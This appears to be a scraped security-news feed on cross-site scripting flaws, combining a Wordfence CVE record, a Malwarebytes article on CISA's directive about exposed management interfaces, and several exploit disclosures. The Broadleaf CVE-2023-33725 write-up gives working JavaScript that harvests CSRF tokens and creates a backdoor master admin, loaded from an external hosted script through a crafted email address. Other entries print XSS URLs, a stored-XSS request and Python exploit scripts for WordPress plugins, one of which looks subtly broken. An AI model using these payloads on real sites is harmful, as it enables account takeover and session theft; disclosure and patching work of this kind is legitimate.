The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in user input that will execute on the admin dashboard.

**Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')**

CVE

CVE-2019-25152

CVSS

7.2 (High)

Publicly Published

March 11, 2019

Last Updated

June 22, 2023

**Description**

The Abandoned Cart Lite for WooCommerce and Abandoned Cart Pro for WooCommerce plugins for WordPress are vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 5.1.3 and 7.12.0 respectively, due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in user input that will execute on the admin dashboard.

**References**

*   www.wordfence.com
*   plugins.trac.wordpress.org
*   wpscan.com

**Share**

**2 affected software packages**

Software Type

Plugin

Software Slug

woocommerce-abandoned-cart (view on wordpress.org)

Patched?

Yes

Remediation

Update to version 5.2.0, or a newer patched version

Affected Version

*   < 5.2.0

Patched Version

*   5.2.0

Software Type

Plugin

Software Slug

woocommerce-abandoned-cart-pro

Patched?

Yes

Remediation

Update to version 7.13.0, or a newer patched version

Affected Version

*   <= 7.12.0

Patched Version

*   7.13.0

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

All the threat data shared in this database is powered by **Wordfence Intelligence Enterprise**.  
Interested in integrating this data into your platform or network?  
Contact us now to discuss API access to our Wordfence Intelligence Enterprise Data Feeds.

Inquire Now

Want to get notified of the latest vulnerabilities that may affect your WordPress site?  
Install Wordfence on your site today to get notified immediately if your site is affected by a vulnerability that has been added to our database.

Get Wordfence

The Wordfence Intelligence WordPress vulnerability database is completely free to access and query via API. Please review the documentation on how to access and consume the vulnerability data via API.

Documentation

CVE-2019-25152: Abandoned Cart Lite for WooCommerce < 5.2.0 and Abandoned Cart Pro for WooCommerce < 7.13.0 - Stored Cross-Site Scripting — Wordfence Intelligence

Categories: News
Tags: CISA

Tags:  BOD 23-02

Tags:  Internet exposed

Tags:  management interfaces

Tags:  vulnerabilities

Tags:  CVE-2023-27992

Tags:  CVE-2023-20887

There is a lot to be said for the strategy of shielding management interfaces from public internet access



(Read more...)




The post Reducing your attack surface is more effective than playing patch-a-mole appeared first on Malwarebytes Labs.

On June 13, 2023 the Cybersecurity and Infrastructure Security Agency (CISA) issued Binding Operational Directive (BOD) 23-02. BOD 23-02 is titled Mitigating the Risk from Internet-Exposed Management Interfaces, and requires federal civilian agencies to remove specific networked management interfaces from the public-facing internet, or implement Zero Trust Architecture capabilities that enforce access control to the interface within 14 days of discovery.

Harsh as that may sound, there is a lot to be said for the strategy of shielding management interfaces from public internet access, or if that's not an option, to apply every possible access control to make sure that only authorized people have access to the management part of the application.

As we have experienced a few times, applying timely patches is absolutely no guarantee you’ll be safe. Take for example the recent MOVEit vulnerability that was used against hundreds of victims before anyone even became aware of the fact that the vulnerability existed.

And new vulnerabilities are disclosed at a worrying rate. To demonstrate that point, here's a quick roundup of the ones I looked at just yesterday.

*   Researchers discovered two dangerous vulnerabilities with Azure Bastion and Azure Container Registry that could allow attackers to achieve cross-site scripting (XSS), injecting malicious scripts into trusted websites. Exploitation of the vulnerabilities could have potentially allowed hackers to gain access to a target’s session within the compromised Azure service.
*   Zyxel warned its NAS (Network Attached Storage) devices users to update their firmware to fix a critical severity command injection vulnerability. The newly discovered vulnerability, CVE-2023-27992, is a pre-authentication command injection problem that could allow an unauthenticated attacker to execute operating system commands by sending specially crafted HTTP requests.
*   VMWare published a security advisory about multiple vulnerabilities in Aria Operations for Networks. Of these vulnerabilities, CVE-2023-20887 was confirmed to be exploited in the wild. Successful exploitation would allow a malicious actor with network access to VMware Aria Operations for Networks to perform a command injection attack resulting in remote code execution.
*   We reported about ASUS fixing nine security flaws in several router models. Among them were two critical vulnerabilities that could lead to memory corruption, and one vulnerability that could allow a remote unauthenticated attacker to achieve arbitrary code execution.

These are applications and services that we find in many organizations' networks. Finding the vulnerable instances and applying the patches could be more than a day’s work in some cases.

But, a workaround that would have worked for many of the above is disablingor minimizing the internet facing access.

This supports the warning from CISA director Jen Easterly, who said:

> “Too often, threat actors are able to use network devices to gain unrestricted access to organizational networks, in turn leading to full-scale compromise. Requiring appropriate controls and mitigations outlined in this Directive is an important step in reducing risk to the federal civilian enterprise. While this Directive only applies to federal civilian agencies, as the threat extends to every sector, we urge all organizations to adopt this guidance. When it comes to reducing cyber risk and ensuring resilience, we all have a role to play.”

**Recommendations**

In a nutshell, the recommendations from CISA to minimize your attack surface are:

*   Remove management interfaces from the internet by making them only accessible from an internal enterprise network. CISA recommends network segmentation to create an isolated management network.
*   Deploy capabilities that enforce access control to the interface through a policy enforcement point separate from the interface itself. In other words, don’t rely on the access control of the instance itself, once it’s vulnerable it could be easy to circumvent.

For more information, we encourage you to read the directive. While the primary audience for this document is FCEB agencies, other organizations may find the content useful.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Reducing your attack surface is more effective than playing patch-a-mole

User Registration & Login and User Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /admin/search-result.php.

Permalink

**1** contributor

**Users who have contributed to this file**

Exploit Title:User Registration & Login and User Management System v1.0 - cross-site scripting (XSS) vulnerability

the component - /admin/search-result.php.

Vendor of Product - https://phpgurukul.com/

Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/

Tested on: Linux

Attack Type - Local

Attack Vectors- searchkey

CVE-2023-33591: CVE/CVE 2023-33591 at main · DARSHANAGUPTA10/CVE

Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.7-GA.

**Broadleaf vulnerable to Cross-site Scripting**

Moderate severity GitHub Reviewed Published Jun 21, 2023 to the GitHub Advisory Database • Updated Jun 21, 2023

GHSA-3862-fmr3-4f3h: Broadleaf vulnerable to Cross-site Scripting

Broadleaf 5.x and 6.x (including 5.2.25-GA and 6.2.6-GA) was discovered to contain a cross-site scripting (XSS) vulnerability via a customer signup with a crafted email address. This is fixed in 6.2.6.1-GA.

**CVE-2023-33725 XSS Vulnerability leading to Admin Account on Broadleaf ECommerce Sites****Broadleaf Background Info**

Broadleaf is a Open source/Commerical E Commerce framework based on Spring/Thymeleaf Broadleaf Commerce All work below is done on their Demo application, but the vulnerabilities are in the underlying framework, the demo site is a thin layer built on top of the Broadleaf framework to showcase it.GitHub - BroadleafCommerce/DemoSite: The Broadleaf Heat Clinic Spring Boot application

The site is split into 2 different applications I'm focussing on.

**Site** : Which is the customer facing storefront.

**Admin** : Which is the backend admin interface used to administer the store, add/remove items, change prices etc.

**Burptrast** The Burptrast plugin was used to find the initial vulnerability, the Broadleaf Demo application was instrumented with Assess, which is provided to Burp via the Burptrast plugin.

**Finding**

**TLDR;** CVE-2023-33725. A XSS Vulnerability in the email field allows JS injection within the checkout page of the Site. But more seriously the same vulnerability appears in the Admin site. Allowing a Customer to register with the website, with a email address containing a XSS attack, when a Admin logs into the Admin site and views the list of customers, the XSS is triggered, which in turn creates a new Admin user, allowing the attacker to login a site Admin.

**Remediation****Fix**

CVE-2023-33725 has been fixed in broadleaf-6.2.6.1-GA if you are using an earlier version it is important to update as soon as possible.

**Mitigation**

If you cannot upgrade your Ecommerce site quickly, it is possible to mitigate this vulnerability by enabling XSS protections provided by broadleaf ( They are not enabled by default )

exploitProtection.xssEnabled\=true
exploitProtection.xsrfEnabled\=true
blc.site.enable.xssWrapper\=true

Of if you have this enabled already, you are safe from this vulnerability.

**Setup****Configuration Files****Agent Config**

If you use either Docker or Manual you will first need a contrast\_security.yaml file. Details of how to do this are under the **contrast\_security.yaml** section of Contrast-Community-Edition.md Once you have the credentials from the config file, copy the **api :** section into the contrast\_security.yaml file in this directory and point the agent at that file.

**Burptrast Config**

Details of how to configure Burptrast are available under README.md

**Docker**

Once you have added your TeamServer Credentials to contrast\_security.yaml, details above. Run the following command docker commands from this directory.

    docker build -t cve-2023-33725 .
    docker run -p 8443:8443 -p 8444:8444 cve-2023-33725
    

The build command may take a few minutes to run. Once running you should be able to access the demo site under https://localhost:8443 And the admin site under https://localhost:8444

**Manual**

**Prerequisities**

*   Java 11
*   Maven
*   Git

Clone the Broadleaf Demo site from github.

**Checkout**

git clone https://github.com/BroadleafCommerce/DemoSite.git  Cd into the directory, roll back to the vulnerable version and build

    cd DemoSite
    git checkout 369d26c
    mvn clean install
    

**Add Assess**

Edit the pom.xml file under DemoSite/site/pom.xml

And modify the properties to

    <properties>
        <debug.port>8000</debug.port>
        <debug.args>-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -javaagent:/location/to/assess/agent/jar/contrast-agent-4.13.1.jar -Dcontrast.config.path=/location/to/contrast/config/contrast_security.yaml</debug.args>
    </properties>
    

**\-javaagent** is the location of the contrast jar file. It can be downloaded fom maven https://repo1.maven.org/maven2/com/contrastsecurity/contrast-agent/4.13.1/contrast-agent-4.13.1.jar

**\-Dcontrast.config.path** is the location of the contast agent config file. This is used to configure and authenticate the agent against TeamServer.

**Build**

To build under DemoSite run the command mvn clean install Then to start up the site application run the following command from the DemoSite/site directory.

    cd site/
    mvn spring-boot:run
    

Once this has started up, from another terminal start up the admin application. This is run from the DemoSite/admin diretory.

    cd admin/
    mvn spring-boot:run
    

Once running you should be able to access the demo site under https://localhost:8443 And the admin site under https://localhost:8444

**Burptrast**

Full details of how to use Burptrast can be found here README.md

Once installed and configured, select the broadleaf-demo application from the list of applications and select update. You should see a large number of routes, these will be imported into the sitemap.

But before that, set the URL path to https localhost 8443 . As this is the URL we will be testing the application from. 

Then select Live Browse and Then Import Routes to Site Map. This will add all these routes to Burp’s sitemap making it easier for Burp to find vulnerabilities.

**Pentest****Finding the Vulnerability**

The Stored XSS vulnerability was first found by running a regular business flow of the site.

*   Select an Item
*   Add it to the Basket
*   Checkout as Guest
*   “Pay”

With Burptrast, findings in Assess triggered by a request from the Burp Proxy are automatically correlated with the session that made them and show up in Burp’s issue tab.

In this case the email address that was added at checkout, was tracked by Assess, saved to the underlying database, then on a following page it was returned to the user without any encoding to mitigate a potential XSS vulnerability.

**Verifying the Vulnerability**

While Assess showed that the value originating from a potential attacker, entered the database and was returned in a way that allows for a Stored XSS vulnerability, it could be that there are some validation or encoding that is done that Assess missed. Also as an email field, it is limited in what can be entered.

First, create a non guest customer account, this will be easier to verify this issue and more likely to be persistent than a guest user checkout.

Then once logged in we can edit the email address field on the profile. This XSS in a valid email address is from XSS in Email Login Fields:

"><svg/onload=alert(1)>"@gmail.com Which fails due to client side validation 

But by modifying a valid email change request in burp ( you need to use the url encoded version of the payload which is %60%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%22%40gmail.com%60 )

We bypass the client side validation and get  And we can verify the vulnerability by going to the checkout page.

**Exploiting the Vulnerability**

So we have a verified XSS Vulnerability, with which you can annoy yourself. But what else can it do?

There is a separate Admin site running on https://localhost:8444/admin

( default credentials for the demo site are admin:admin )

By going to customers page we immediately see that the admin site is vulnerable as it displays the signed up customer's email addresses and as this impacts the site admin we should be able to further leverage this XSS. 

**Creating an Admin Account via XSS**

Under https://localhost:8444/admin/user-management we have the ability of creating new admin users. 

This generates a POST request we can replicate within the XSS.

But there is an issue, there are two tokens within the request, a CSRFToken and StateVersionToken. If we want to create a new admin user we also need to find these tokens.

These tokens reside within the HTML of the generated page. So sending a GET request to /admin/user-management which doesn't change the application state and therefore doesn’t require a token, reveals the tokens.

function getTokenJS() {
    var xhr \= new XMLHttpRequest();
    xhr.responseType \= "document";
    xhr.open("GET", "/admin/user-management", true);
    xhr.onload \= function (e) {
        if (xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
            page \= xhr.response
            csrf \= page.getElementsByName("csrfToken");
            state \= page.getElementsByName("stateVersionToken");
            console.log("The token is: " + csrf\[0\].value);
            console.log("The state is: " + state\[0\].value);
            submitFormWithTokenJS(csrf\[0\].value, state\[0\].value);
        }
    };
    xhr.send(null);
}

This retrieves the CSRF and State tokens.

The next function takes the tokens and embeds them into the POST request to add the new admin user.

function submitFormWithTokenJS(token, state) {
    const username \= "backdooradmin";

    var xhr \= new XMLHttpRequest();
    xhr.open("POST", "/admin/user-management/add", true);
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhr.responseType \= "document";
    xhr.onreadystatechange \= function() {
        if(xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
            console.log(xhr.responseURL)
            var result \= /\[^/\]\*$/.exec(xhr.responseURL)\[0\];
            addAdminAccess(token,state,result);
        }
    }
    xhr.send("ceilingEntityClassname=org.broadleafcommerce.openadmin.server.security.domain.AdminUser&entityType=org.broadleafcommerce.openadmin.server.security.domain.AdminUserImpl&id=&sectionCrumbs=&mainEntityName=&preventSubmit=false&jsErrorMapString=&fields%5B'name'%5D.value="+username+"&fields%5B'login'%5D.value="+username+"&fields%5B'email'%5D.value="+username+"%40example.com&fields%5B'phoneNumber'%5D.value=&fields%5B'password'%5D.value="+username+"&fields%5B'passwordConfirm'%5D.value="+username+"&fields%5B'activeStatusFlag'%5D.value=true&fields%5B'auditable\_\_createdBy'%5D.value=&fields%5B'auditable\_\_dateCreated'%5D.value-display=&fields%5B'auditable\_\_dateCreated'%5D.value=&fields%5B'auditable\_\_updatedBy'%5D.value=&fields%5B'auditable\_\_dateUpdated'%5D.value-display=&fields%5B'auditable\_\_dateUpdated'%5D.value=&csrfToken="+token+"&stateVersionToken="+state);
}

There is a 3rd step. While the above generates the admin user, its a admin account with no privileges.

The next step gives the admin user master admin privileges.

function addAdminAccess(token,state,path) {
    var xhr \= new XMLHttpRequest();
    xhr.open("POST", "/admin/user-management/"+path+"/allRoles/add", true);
    xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhr.responseType \= "document";
    xhr.onreadystatechange \= function() {
        if(xhr.readyState \=== XMLHttpRequest.DONE && xhr.status \=== 200) {
      
        }
    }
    xhr.send("fields%5B'id'%5D.value=-1&fields%5B'description'%5D.value=Admin+Master+Access&fields%5B'\_\_adminMainEntity'%5D.value=ROLE\_ADMIN&csrfToken="+token+"&stateVersionToken="+state);
}

With this js file created, we just need to host it somewhere https://joebeeton.github.io/b.js

Then reference it in our original XSS by setting the customer email address to

"<script src='https://joebeeton.github.io/b.js' />"@ab.uk  ( you need to use the url encoded version of the payload which is %22%3Cscript%20src%3D%27https%3A%2F%2Fjoebeeton.github.io%2Fb.js%27%20%2F%3E%22%40ab.uk ) Then wait for an unsuspecting admin user to login, trigger the xss payload and generate the new admin account for us.  And from there the attacker can login with the credentials newadmin : newadmin as an admin and takeover the site.

CVE-2023-33725: Burptrast/docs/CVE-2023-33725 at main · Contrast-Security-OSS/Burptrast

PHP Online School version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/online-school/                                 ││  Vendor   : NetArt Media                                                               ││  Software : PHP Online School 1.0                                                      ││  Vuln Type: Reflected XSS - Stored XSS                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Reflected XSS                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        ││                                                                                        ││  Stored XSS                                                                            ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1## Stored XSSPOST /online-school/users/index.php HTTP/2-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="title"Any Title-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="post_message"-----------------------------124654322118707720774051212206Content-Disposition: form-data; name="message"[XSS Payload]-----------------------------124654322118707720774051212206## Steps to Reproduce:1. Signup & Login in any Normal User Mode2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)3. Select Any Subject4. Write any Title5. Inject your [XSS Payload] in "Message Box"6. Select Any Priority7. Press Submit8. When ADMIN check Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)9. XSS Will Fire and Executed on his Browser [-] Done

PHP Online School 1.0 Cross Site Scripting

PHP Mail version 5.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/mall/                                          ││  Vendor   : NetArt Media                                                               ││  Software : PHP Mall 5.0                                                               ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1[-] Done

PHP Mall 5.0 Cross Site Scripting

WordPress Super Socializer plugin version 7.13.52 suffers from a cross site scripting vulnerability.

    # Exploit Title: Super Socializer 7.13.52 - Reflected XSS# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/super-socializer# Version: 7.13.52 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-2779import requests# The URL of the vulnerable AJAX endpointurl = "https://example.com/wp-admin/admin-ajax.php"# The vulnerable parameter that is not properly sanitized and escapedvulnerable_param = "<img src=x onerror=alert(document.domain)>"# The payload that exploits the vulnerabilitypayload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}# Send a POST request to the vulnerable endpoint with the payloadresponse = requests.post(url, data=payload)# Check if the payload was executed by searching for the injected script tagif "<img src=x onerror=alert(document.domain)>" in response.text:    print("Vulnerability successfully exploited")else:    print("Vulnerability not exploitable")

WordPress Super Socializer 7.13.52 Cross Site Scripting

PHP Car Dealer version 3.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://www.netartmedia.net/autodealer/                                    ││  Vendor   : NetArt Media                                                               ││  Software : PHP Car Dealer 3.0                                                         ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpURL parameter is vulnerable to RXSShttps://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1[-] Done

PHP Car Dealer 3.0 Cross Site Scripting

WordPress WP Sticky Social plugin version 1.0.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

    # Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)#  Dork: inurl:~/admin/views/admin.php# Date: 2023-06-20# Exploit Author: Amirhossein Bahramizadeh# Category : Webapps# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social# Version: 1.0.1 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-3320import requestsimport hashlibimport time# Set the target URLurl = "http://example.com/wp-admin/admin.php?page=wpss_settings"# Set the user agent stringuser_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"# Generate the nonce valuenonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()# Set the data payloadpayload = {    "wpss_nonce": nonce,    "wpss_setting_1": "value_1",    "wpss_setting_2": "value_2",    # Add additional settings as needed}# Set the request headersheaders = {    "User-Agent": user_agent,    "Referer": url,    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",    # Add additional headers as needed}# Send the POST requestresponse = requests.post(url, data=payload, headers=headers)# Check the response status codeif response.status_code == 200:    print("Request successful")else:    print("Request failed")

Tag

#xss